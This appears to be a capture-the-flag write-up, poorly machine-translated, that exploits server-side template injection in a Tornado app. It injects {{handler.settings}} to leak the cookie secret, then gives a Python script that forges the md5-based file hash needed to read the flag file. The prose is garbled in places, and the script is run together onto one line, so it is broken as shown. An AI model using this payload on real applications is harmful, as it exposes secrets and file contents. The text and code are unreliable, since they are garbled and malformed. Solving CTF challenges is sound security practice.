Open see three files:
Three document reads as follows:
By url know, you need to know to access a file: filename with filehash
Direct access attempt does not work, think of a burp capture, but for a long time did not catch arrested, read online wp is the template injection
tornado is a python template, welcome.txt the render is python in a rendering function,
Error when the url is this
Try to replace the rear: 111 {} {}, the output!
In the tornado template, there are some objects that can be accessed quickly, for example:
<title> {{ escape(handler.settings["cookie"]) }} </title>
Then the input: {{}} handler.settings
Get a cookie on the OK!
import hashlib def md5value(s): md5 = hashlib.md5() md5.update(s) return md5.hexdigest() def jiami(): filename = '/fllllllllllllag' cookie_s ="ea7d75de-4ca5-486a-a69c-e690f3a8c217" print(md5value(filename.encode('utf-8'))) x=md5value(filename.encode('utf-8')) y=cookie_s+xprint(md5value(y.encode('utf-8'))) jiami()